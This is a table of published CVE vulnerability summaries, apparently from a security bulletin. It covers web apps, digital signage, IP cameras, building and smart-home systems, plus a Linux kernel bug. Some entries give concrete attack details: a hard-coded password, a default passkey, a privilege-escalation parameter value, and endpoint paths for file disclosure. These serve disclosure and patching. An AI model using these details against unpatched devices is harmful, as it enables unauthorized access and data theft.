| Telepedia--TableProgressTracking | TableProgressTracking is a MediaWiki extension to track progress against specific criteria. Versions 1.2.0 and below do not enforce CSRF token validation in the REST API. As a result, an attacker could craft a malicious webpage that, when visited by an authenticated user on a wiki with the extension enabled, would trigger unintended authenticated actions through the victim's browser. Due to the lack of token validation, an attacker can delete or track progress against tables. This issue is patched in version 1.2.1 of the extension. | 2025-12-10 | 3.5 | CVE-2025-67646 | https://github.com/Telepedia/TableProgressTracking/security/advisories/GHSA-j24f-hw6w-cq78 https://github.com/Telepedia/TableProgressTracking/commit/e2aa8c4b3bb78989c6fe39070a95a26d22b91c94 |
| AzuraCast--AzuraCast | AzuraCast is a self-hosted, all-in-one web radio management suite. Version 0.23.1 mistakenly includes an API endpoint that is intended for internal use by the SFTP software sftpgo, exposing it to the public-facing HTTP API for AzuraCast installations. A user with specific internal knowledge of a station's operations can craft a custom HTTP request that would affect the contents of a station's database, without revealing any internal information about the station. In order to carry out an attack, a malicious user would need to know a valid SFTP station username and the corresponding internal filesystem structure. This issue is fixed in version 0.23.2. | 2025-12-12 | 3.1 | CVE-2025-67737 | https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-9449-rphm-mjqr https://github.com/AzuraCast/AzuraCast/commit/34620dbad93f6cd8e209a4220e3e53c7c5fea844 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.2, improper repository URL validation could lead to local path disclosure. | 2025-12-11 | 3.1 | CVE-2025-67739 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11, path traversal was possible via file upload. | 2025-12-11 | 3.8 | CVE-2025-67742 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| rtcamp--rtMedia for WordPress, BuddyPress and bbPress | The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to Information Disclosure due to missing authorization in the handle_rest_pre_dispatch() function when the Godam plugin is active, in versions 4.7.0 to 4.7.3. This makes it possible for unauthenticated attackers to retrieve media items associated with draft or private posts. | 2025-12-13 | 3.7 | CVE-2025-9218 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68533b4c-1bdf-4104-a263-757b018af129?source=cve https://wordpress.org/plugins/buddypress-media/#developers https://plugins.trac.wordpress.org/changeset/3386907/buddypress-media/tags/4.7.4/app/main/controllers/api/RTMediaJsonApi.php |
| IBM--IBM QRadar SIEM | IBM QRadar SIEM 7.5 - 7.5.0 UP14 IF01 is affected by an information disclosure vulnerability involving exposure of directory information. IBM has addressed this vulnerability in the latest update. | 2025-12-09 | 2.7 | CVE-2024-56464 | https://www.ibm.com/support/pages/node/7253664 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak Admin REST (Representational State Transfer) API. This vulnerability allows information disclosure of sensitive role metadata via insufficient authorization checks on the /admin/realms/{realm}/roles endpoint. | 2025-12-10 | 2.7 | CVE-2025-14082 | https://access.redhat.com/security/cve/CVE-2025-14082 RHBZ#2419078 |
| n/a--GreenCMS | A flaw has been found in GreenCMS 2.3.0603. Affected by this issue is some unknown functionality of the file /Admin/Controller/CustomController.class.php of the component Menu Management Page. This manipulation of the argument Link causes cross site scripting. The attack may be initiated remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-08 | 2.4 | CVE-2025-14244 | VDB-334754 \| GreenCMS Menu Management CustomController.class.php cross site scripting VDB-334754 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702435 \| GreenCMS 2.3.0603 CWE-79 - Cross-site Scripting https://gist.github.com/b1uel0n3/83f9965b3499a2abfee30c77458f718a |
| code-projects--Student File Management System | A vulnerability was found in code-projects Student File Management System 1.0. This affects an unknown part of the file /admin/update_user.php of the component Update User Page. Performing manipulation results in cross site scripting. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-12-14 | 2.4 | CVE-2025-14662 | VDB-336394 \| code-projects Student File Management System Update User update_user.php cross site scripting VDB-336394 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #713873 \| Code-projects Student File Management System v1.0 Stored XSS vulnerability https://github.com/jjjjj-zr/jjjjjzr15/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was determined in code-projects Student File Management System 1.0. This vulnerability affects unknown code of the file /admin/update_student.php. Executing manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-14 | 2.4 | CVE-2025-14663 | VDB-336395 \| code-projects Student File Management System update_student.php cross site scripting VDB-336395 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714018 \| Code-projects Student File Management System v1.0 Stored XSS vulnerability https://github.com/jjjjj-zr/jjjjjzr16/issues/1 https://code-projects.org/ |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow a privileged user to bypass validation, passing user input into the application as trusted data, due to client-side enforcement of server-side security. | 2025-12-08 | 2.7 | CVE-2025-36102 | https://www.ibm.com/support/pages/node/7253273 |
| Fortinet--FortiAuthenticator | A direct request ('forced browsing') vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least sponsor permissions to read and download device logs via accessing specific endpoints. | 2025-12-09 | 2.6 | CVE-2025-57823 | https://fortiguard.fortinet.com/psirt/FG-IR-25-554 |
| Fortinet--FortiAuthenticator | An improper access control vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least read-only admin permission to obtain the credentials of other administrators' messaging services via crafted requests. | 2025-12-09 | 2.6 | CVE-2025-59923 | https://fortiguard.fortinet.com/psirt/FG-IR-25-616 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11, improper access control could expose a GitHub App token's metadata. | 2025-12-11 | 2.7 | CVE-2025-67740 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| uriparser project--uriparser | uriparser through 0.9.9 allows unbounded recursion and stack consumption, as demonstrated by ParseMustBeSegmentNzNc with large input containing many commas. | 2025-12-14 | 2.9 | CVE-2025-67899 | https://github.com/uriparser/uriparser/issues/282 https://github.com/uriparser/uriparser/pull/284 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| MIYAGAWA--Plack::Middleware::Session | Plack-Middleware-Session versions before 0.17 may be vulnerable to HMAC comparison timing attacks | 2025-12-09 | not yet calculated | CVE-2013-10031 | https://github.com/plack/Plack-Middleware-Session/commit/b7f0252269ba1bb812b5dc02303754fe94c808e4 |
| SpinetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 and lower contains an authenticated path traversal vulnerability that allows attackers to manipulate file backup and deletion operations through unverified input parameters. Attackers can exploit path traversal techniques in index.php to write backup files to arbitrary locations and delete files by manipulating backup and file delete requests. | 2025-12-10 | not yet calculated | CVE-2020-36883 | ExploitDB-48844 Official Product Homepage Zero Science Lab Disclosure ZSL-2020-5594 Mbed TLS GitHub Repository VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Authenticated Path Traversal via File Operations |
| BrightSign, LLC--BrightSign Digital Signage Diagnostic Web Server | BrightSign Digital Signage Diagnostic Web Server 8.2.26 and less contains an unauthenticated server-side request forgery vulnerability in the 'url' GET parameter of the Download Speed Test service. Attackers can specify external domains to bypass firewalls and perform network enumeration by forcing the application to make arbitrary HTTP requests to internal network hosts. | 2025-12-10 | not yet calculated | CVE-2020-36884 | ExploitDB-48843 BrightSign Homepage Zero Science Lab Disclosure Zero Science GitHub Repository VulnCheck Advisory: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF |
| Sony Electronics Inc.--IPELA Network Camera | Sony IPELA Network Camera 1.82.01 contains a stack buffer overflow vulnerability in the ftpclient.cgi endpoint that allows remote attackers to execute arbitrary code. Attackers can exploit the vulnerability by sending a crafted POST request with oversized data to the FTP client functionality, potentially causing remote code execution or denial of service. | 2025-12-10 | not yet calculated | CVE-2020-36885 | ExploitDB-48842 Fixed in 1.88.0.0 Zero Science Lab Disclosure Product web page VulnCheck Advisory: Sony IPELA Network Camera 1.82.01 Remote Stack Buffer Overflow via ftpclient.cgi |
| SpinetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without proper request validation. Attackers can craft a malicious web page that automatically submits a form to create a new admin user with full system privileges when a logged-in user visits the page. | 2025-12-10 | not yet calculated | CVE-2020-36886 | ExploitDB-48846 Official Product Homepage Zero Science Lab Disclosure ZSL-2020-5592 Product Homepage VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Cross-Site Request Forgery via User Creation |
| SpinetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 contains an unauthenticated information disclosure vulnerability in the database backup directory. Attackers can access the /content/files/backups/ endpoint to download sensitive backup files containing user credentials and system information. | 2025-12-10 | not yet calculated | CVE-2020-36887 | ExploitDB-48845 Official Product Homepage Vendor Security Advisory for ZSL-2020-5593 VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Unauthenticated Database Backup Disclosure |
| SpinetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 contains a username enumeration vulnerability in its login script that allows attackers to identify valid user accounts. Attackers can send crafted login requests with different usernames to distinguish between existing and non-existing accounts by analyzing the server's error responses. | 2025-12-10 | not yet calculated | CVE-2020-36888 | ExploitDB-48847 Official Product Homepage Vendor Security Advisory for ZSL-2020-5591 VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration via Login Script |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | Eibiz i-Media Server Digital Signage 3.8.0 contains an unauthenticated privilege escalation vulnerability in the updateUser object that allows attackers to modify user roles. Attackers can exploit the /messagebroker/amf endpoint to elevate privileges and take over user accounts by manipulating role settings without authentication. | 2025-12-10 | not yet calculated | CVE-2020-36892 | ExploitDB-48774 Vulnerability Advisory Reference VulnCheck Advisory: Eibiz i-Media Server Digital Signage 3.8.0 Unauthenticated Privilege Escalation |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | Eibiz i-Media Server Digital Signage 3.8.0 contains a directory traversal vulnerability that allows unauthenticated remote attackers to access files outside the server's root directory. Attackers can exploit the 'oldfile' GET parameter to view sensitive configuration files like web.xml and system files such as win.ini. | 2025-12-10 | not yet calculated | CVE-2020-36893 | ExploitDB-48766 EIBIZ Co.,Ltd. Product Web Page Zero Science Advisory ID ZSL-2020-5585 VulnCheck Advisory: Eibiz i-Media Server Digital Signage 3.8.0 Directory Traversal Vulnerability |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | Eibiz i-Media Server Digital Signage 3.8.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to create admin users through AMF-encoded object manipulation. Attackers can send crafted serialized objects to the /messagebroker/amf endpoint to create administrative users without authentication, bypassing security controls. | 2025-12-10 | not yet calculated | CVE-2020-36894 | ExploitDB-48763 Vulnerability Advisory Reference VulnCheck Advisory: Eibiz i-Media Server Digital Signage 3.8.0 Unauthenticated User Creation Vulnerability |
| EIBIZ Co.,Ltd.--i-Media Server Digital Signage | EIBIZ i-Media Server Digital Signage 3.8.0 contains an unauthenticated configuration disclosure vulnerability that allows remote attackers to access sensitive configuration files via direct object reference. Attackers can retrieve the SiteConfig.properties file through an HTTP GET request, exposing administrative credentials, database connection details, and system configuration information. | 2025-12-10 | not yet calculated | CVE-2020-36895 | ExploitDB-48764 EIBIZ Co.,Ltd. Product Homepage Zero Security Advisory ZSL-2020-5583 VulnCheck Advisory: EIBIZ i-Media Server Digital Signage 3.8.0 Unauthenticated Configuration Disclosure |
| Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains a cleartext credentials vulnerability that allows unauthenticated attackers to access administrative login information through an unprotected XML file. Attackers can retrieve hardcoded admin credentials by requesting the '/xml/User/User.xml' file, enabling direct authentication bypass. | 2025-12-10 | not yet calculated | CVE-2020-36896 | ExploitDB-48748 Official Product Homepage Vendor Security Advisory for ZSL-2020-5579 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Cleartext Credentials Disclosure |
| Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated remote code execution vulnerability in the QH.aspx file that allows attackers to upload malicious ASPX scripts. Attackers can exploit the file upload functionality by using the 'remotePath' and 'fileToUpload' parameters to write and execute arbitrary system commands on the server. | 2025-12-10 | not yet calculated | CVE-2020-36897 | ExploitDB-48751 Official Product Homepage Vendor Security Advisory for ZSL-2020-5582 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Unauthenticated Remote Code Execution |
| Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated file deletion vulnerability in the QH.aspx endpoint that allows remote attackers to delete files without authentication. Attackers can exploit the 'data' parameter by sending a POST request with file paths to delete arbitrary files with web server permissions using directory traversal sequences. | 2025-12-10 | not yet calculated | CVE-2020-36898 | ExploitDB-48749 Official Product Homepage Vendor Security Advisory for ZSL-2020-5580 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion |
| Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd.--QiHang Media Web Digital Signage | QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive files through unverified 'filename' and 'path' parameters. Attackers can exploit the QH.aspx endpoint to read arbitrary files and directory contents without authentication by manipulating download and getAll actions. | 2025-12-10 | not yet calculated | CVE-2020-36899 | ExploitDB-48750 Official Product Homepage Vendor Security Advisory for ZSL-2020-5581 VulnCheck Advisory: QiHang Media Web Digital Signage 3.0.9 Unauthenticated Arbitrary File Disclosure |
| All-Dynamics Software GmbH--Digital Signage System | All-Dynamics Digital Signage System 2.0.2 contains a cross-site request forgery vulnerability that allows attackers to create administrative users without proper request validation. Attackers can craft a malicious web page that automatically submits forms to create a new user with global administrative privileges when a logged-in user visits the page. | 2025-12-10 | not yet calculated | CVE-2020-36900 | ExploitDB-48736 Zero Science Advisory ID ZSL-2020-5576 All-Dynamics Software GmbH Homepage VulnCheck Advisory: All-Dynamics Digital Signage System 2.0.2 Cross-Site Request Forgery via User Management |
| UBICOD Co., Ltd. \| MEDIVISION INC.--UBICOD Medivision Digital Signage | UBICOD Medivision Digital Signage 1.5.1 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without proper request validation. Attackers can craft a malicious web page that submits a form to the /query/user/itSet endpoint to add a new admin user with elevated privileges. | 2025-12-10 | not yet calculated | CVE-2020-36901 | ExploitDB-48694 UBICOD Medivision Digital Signage Product Homepage Zero Science Advisory for ZSL-2020-5574 VulnCheck Advisory: UBICOD Medivision Digital Signage 1.5.1 Cross-Site Request Forgery via User Management |
| UBICOD Co., Ltd. \| MEDIVISION INC.--UBICOD Medivision Digital Signage | UBICOD Medivision Digital Signage 1.5.1 contains an authorization bypass vulnerability that allows normal users to escalate privileges by manipulating the 'ft[grp]' parameter. Attackers can send a GET request to /html/user with 'ft[grp]' set to integer value '3' to gain super admin rights without authentication. | 2025-12-10 | not yet calculated | CVE-2020-36902 | ExploitDB-48684 UBICOD Co., Ltd. \| MEDIVISION INC. Zero Security Advisory ZSL-2020-5575 VulnCheck Advisory: UBICOD Medivision Digital Signage 1.5.1 Authorization Bypass via User Privileges |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 allows an attacker to escalate privileges from a read user to an admin user by manipulating permissions and exploiting a vulnerability in the update_user_permissions.php script. Attackers can submit a malicious HTTP POST request to PHP scripts in '/plugins/useradmin/' directory. | 2025-12-09 | not yet calculated | CVE-2021-47701 | ExploitDB-50669 Zero Science Lab Disclosure (ZSL-2022-5693) VulnCheck Advisory: OpenBMCS User Management Privilege Escalation |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains a CSRF vulnerability that allows attackers to perform actions with administrative privileges by exploiting the sendFeedback.php endpoint. Attackers can submit malicious requests to trigger unintended actions, such as sending emails or modifying system settings. | 2025-12-09 | not yet calculated | CVE-2021-47702 | ExploitDB-50667 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5691) VulnCheck Advisory: OpenBMCS Cross Site Request Forgery (CSRF) via sendFeedback.php |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the 'ip' parameter to force the application to make an HTTP request to an arbitrary destination host. | 2025-12-09 | not yet calculated | CVE-2021-47703 | ExploitDB-50670 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5694) VulnCheck Advisory: OpenBMCS Server Side Request Forgery (SSRF) via /php/query.php |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting arbitrary SQL code. Attackers can send GET requests to /debug/obix_test.php with malicious 'id' values to extract database information. | 2025-12-09 | not yet calculated | CVE-2021-47704 | ExploitDB-50668 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5692) VulnCheck Advisory: OpenBMCS SQL Injection via obix_test.php |
| COMMAX Co., Ltd.--COMMAX UMS Client ActiveX Control | COMMAX UMS Client ActiveX Control 1.7.0.2 contains a heap-based buffer overflow vulnerability that allows attackers to execute arbitrary code by providing excessively long string arrays through multiple functions. Attackers can exploit improper boundary validation in CNC_Ctrl.dll to cause heap corruption and potentially gain system-level access. | 2025-12-09 | not yet calculated | CVE-2021-47705 | ExploitDB-50232 Zero Science Lab Disclosure (ZSL-2021-5664) Reference VulnCheck Advisory: CNC_Ctrl DllUnregisterServer Access Violation |
| COMMAX Co., Ltd.--COMMAX Biometric Access Control System | COMMAX Biometric Access Control System 1.0.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to access sensitive information and circumvent physical controls in smart homes and buildings by exploiting cookie poisoning. Attackers can forge cookies to bypass authentication and disclose sensitive information. | 2025-12-09 | not yet calculated | CVE-2021-47706 | ExploitDB-50206 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5661) COMMAX Biometric Access Control System 1.0.0 Product Page VulnCheck Advisory: COMMAX Biometric Access Control System Authentication Bypass |
| COMMAX Co., Ltd.--COMMAX CVD-Axx DVR | COMMAX CVD-Axx DVR 5.1.4 contains weak default administrative credentials that allow remote password attacks and disclose RTSP stream. Attackers can exploit this by sending a POST request with the 'passkey' parameter set to '1234', allowing them to access the web control panel. | 2025-12-09 | not yet calculated | CVE-2021-47707 | ExploitDB-50210 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5667) VulnCheck Advisory: COMMAX CVD-Axx DVR Weak Default Credentials Stream Disclosure |
| COMMAX Co., Ltd.--Smart Home IoT Control System | COMMAX Smart Home System CDP-1020n contains an SQL injection vulnerability that allows attackers to bypass authentication by injecting arbitrary SQL code through the 'id' parameter in 'loginstart.asp'. Attackers can exploit this by sending a POST request with malicious 'id' values to manipulate database queries and gain unauthorized access. | 2025-12-09 | not yet calculated | CVE-2021-47708 | ExploitDB-50207 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5662) Zero Science GitHub Repository VulnCheck Advisory: COMMAX Smart Home IoT Control System SQL Injection Authentication Bypass |
| COMMAX Co., Ltd.--Smart Home Ruvie CCTV Bridge DVR Service | COMMAX Smart Home System allows an unauthenticated attacker to change configuration and cause denial-of-service through the setconf endpoint. Attackers can trigger a denial-of-service scenario by sending a malformed request to the setconf endpoint. | 2025-12-09 | not yet calculated | CVE-2021-47709 | ExploitDB-50209 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5666) VulnCheck Advisory: COMMAX Smart Home Ruvie CCTV Bridge DVR Service Config Write / DoS |
| COMMAX Co., Ltd.--Smart Home Ruvie CCTV Bridge DVR Service | COMMAX Smart Home System is a smart IoT home solution that allows an unauthenticated attacker to disclose RTSP credentials in plain-text by exploiting the /overview.asp endpoint. Attackers can access sensitive information, including login credentials and DVR settings, by submitting a GET request to this endpoint. | 2025-12-09 | not yet calculated | CVE-2021-47710 | ExploitDB-50208 COMMAX Homepage Zero Science Lab Disclosure (ZSL-2021-5665) VulnCheck Advisory: COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure |
| IntelliChoice--IntelliChoice eFORCE Software Suite | IntelliChoice eFORCE Software Suite 2.5.9 contains a username enumeration vulnerability that allows attackers to enumerate valid users by exploiting the 'ctl00$MainContent$UserName' POST parameter. Attackers can send requests with valid usernames to retrieve user information. | 2025-12-09 | not yet calculated | CVE-2021-47717 | ExploitDB-50164 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5658) VulnCheck Advisory: IntelliChoice eFORCE Software Suite Username Enumeration |
| OPEN BMCS--OpenBMCS | OpenBMCS 2.4 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive files by exploiting directory listing functionality. Attackers can browse directories like /debug/ and /php/ to discover configuration files, database credentials, and system information. | 2025-12-09 | not yet calculated | CVE-2021-47718 | ExploitDB-50671 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5695) VulnCheck Advisory: OpenBMCS Directory Listing Information Disclosure |
| COMMAX Co., Ltd.--COMMAX WebViewer ActiveX Control | COMMAX WebViewer ActiveX Control 2.1.4.5 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by providing excessively long string arrays through multiple functions. Attackers can exploit boundary errors in Commax_WebViewer.ocx to cause buffer overflow conditions and potentially gain code execution. | 2025-12-09 | not yet calculated | CVE-2021-47719 | ExploitDB-50231 Zero Science Lab Disclosure (ZSL-2021-5663) Reference VulnCheck Advisory: CNC_Ctrl DllUnregisterServer f5501 Access Violation |
| STVS SA--STVS ProVision | STVS ProVision 5.9.10 contains a cross-site request forgery vulnerability that allows attackers to perform actions with administrative privileges by exploiting unvalidated HTTP requests. Attackers can visit malicious web sites to trigger the forge request, allowing them to create new admin users. | 2025-12-09 | not yet calculated | CVE-2021-47723 | ExploitDB-49482 STVS SA Homepage Zero Science Lab Disclosure (ZSL-2021-5625) VulnCheck Advisory: STVS ProVision Cross-Site Request Forgery (Add Admin) |
| STVS SA--STVS ProVision | STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd. | 2025-12-09 | not yet calculated | CVE-2021-47724 | ExploitDB-49481 Zero Science Lab Disclosure (ZSL-2021-5623) Reference VulnCheck Advisory: STVS ProVision Authenticated File Disclosure via archive.rb |
| Selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains an unauthenticated vulnerability that allows remote attackers to access live video streams without authentication. Attackers can directly connect to RTP/RTSP or M-JPEG streams by requesting specific endpoints like p1.mjpg or p1.264 to view camera footage. | 2025-12-09 | not yet calculated | CVE-2021-47727 | ExploitDB-49459 Selea s.r.l. Product Homepage Zero Science Lab Disclosure (ZSL-2021-5619) Mbed TLS GitHub Repository VulnCheck Advisory: Selea Targa IP Camera Unauthenticated Stream Disclosure |
| Selea--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains an unauthenticated command injection vulnerability in utils.php that allows remote attackers to execute arbitrary shell commands. Attackers can exploit the 'addr' and 'port' parameters to inject commands and gain www-data user access through chained local file inclusion techniques. | 2025-12-09 | not yet calculated | CVE-2021-47728 | ExploitDB-49460 Selea Homepage Zero Science Lab Disclosure (ZSL-2021-5620) Zero Science GitHub Repository VulnCheck Advisory: Selea Targa IP Camera Remote Code Execution via Utils |
| selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains a stored cross-site scripting vulnerability in the 'files_list' parameter that allows attackers to inject malicious HTML and script code. Attackers can send a POST request to /cgi-bin/get_file.php with crafted payload to execute arbitrary scripts in victim's browser session. | 2025-12-09 | not yet calculated | CVE-2021-47729 | ExploitDB-49454 Selea s.r.l. Product Homepage Zero Science Lab Disclosure (ZSL-2021-5614) Selea Targa IP OCR-ANPR Camera Product Page VulnCheck Advisory: Selea Targa IP Camera Stored Cross-Site Scripting via Files List |
| Selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains a cross-site request forgery vulnerability that allows attackers to create administrative users without authentication. Attackers can craft a malicious web page that submits a form to add a new admin user with full system privileges when a logged-in user visits the page. | 2025-12-09 | not yet calculated | CVE-2021-47730 | ExploitDB-49458 Official Product Homepage Zero Science Lab Disclosure (ZSL-2021-5618) GitHub Repository of Zero Science VulnCheck Advisory: Selea Targa IP Camera Cross-Site Request Forgery via Admin Creation |
| Selea s.r.l.--Selea Targa IP OCR-ANPR Camera | Selea Targa IP OCR-ANPR Camera contains a hard-coded developer password vulnerability that allows unauthorized configuration access through an undocumented page. Attackers can exploit the hidden endpoint by using the hard-coded password 'Selea781830' to enable configuration upload and overwrite device settings. | 2025-12-09 | not yet calculated | CVE-2021-47731 | ExploitDB-49455 Selea s.r.l. Product Web Page Zero Science Lab Disclosure (ZSL-2021-5615) Zero Science GitHub Repository VulnCheck Advisory: Selea Targa IP Camera Developer Backdoor Configuration Overwrite |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid0, raid10: Don't set discard sectors for request queue It should use disk_stack_limits to get a proper max_discard_sectors rather than setting a value by stack drivers. And there is a bug. If all member disks are rotational devices, raid0/raid10 set max_discard_sectors. So the member devices are not ssd/nvme, but raid0/raid10 export the wrong value. It reports warning messages in function __blkdev_issue_discard when mkfs.xfs like this: [ 4616.022599] ------------[ cut here ]------------ [ 4616.027779] WARNING: CPU: 4 PID: 99634 at block/blk-lib.c:50 __blkdev_issue_discard+0x16a/0x1a0 [ 4616.140663] RIP: 0010:__blkdev_issue_discard+0x16a/0x1a0 [ 4616.146601] Code: 24 4c 89 20 31 c0 e9 fe fe ff ff c1 e8 09 8d 48 ff 4c 89 f0 4c 09 e8 48 85 c1 0f 84 55 ff ff ff b8 ea ff ff ff e9 df fe ff ff <0f> 0b 48 8d 74 24 08 e8 ea d6 00 00 48 c7 c6 20 1e 89 ab 48 c7 c7 [ 4616.167567] RSP: 0018:ffffaab88cbffca8 EFLAGS: 00010246 [ 4616.173406] RAX: ffff9ba1f9e44678 RBX: 0000000000000000 RCX: ffff9ba1c9792080 [ 4616.181376] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff9ba1c9792080 [ 4616.189345] RBP: 0000000000000cc0 R08: ffffaab88cbffd10 R09: 0000000000000000 [ 4616.197317] R10: 0000000000000012 R11: 0000000000000000 R12: 0000000000000000 [ 4616.205288] R13: 0000000000400000 R14: 0000000000000cc0 R15: ffff9ba1c9792080 [ 4616.213259] FS: 00007f9a5534e980(0000) GS:ffff9ba1b7c80000(0000) knlGS:0000000000000000 [ 4616.222298] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4616.228719] CR2: 000055a390a4c518 CR3: 0000000123e40006 CR4: 00000000001706e0 [ 4616.236689] Call Trace: [ 4616.239428] blkdev_issue_discard+0x52/0xb0 [ 4616.244108] blkdev_common_ioctl+0x43c/0xa00 [ 4616.248883] blkdev_ioctl+0x116/0x280 [ 4616.252977] __x64_sys_ioctl+0x8a/0xc0 [ 4616.257163] do_syscall_64+0x5c/0x90 [ 4616.261164] ? handle_mm_fault+0xc5/0x2a0 [ 4616.265652] ? do_user_addr_fault+0x1d8/0x690 [ 4616.270527] ? do_syscall_64+0x69/0x90 [ 4616.274717] ? exc_page_fault+0x62/0x150 [ 4616.279097] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 4616.284748] RIP: 0033:0x7f9a55398c6b | 2025-12-08 | not yet calculated | CVE-2022-50583 | https://git.kernel.org/stable/c/e80bef070699d2e791badefccb1ddabd6998d468 https://git.kernel.org/stable/c/27e5d61a8e6919b5c0c6f473703ffea2acba862a https://git.kernel.org/stable/c/8e1a2279ca2b0485cc379a153d02a9793f74a48f |
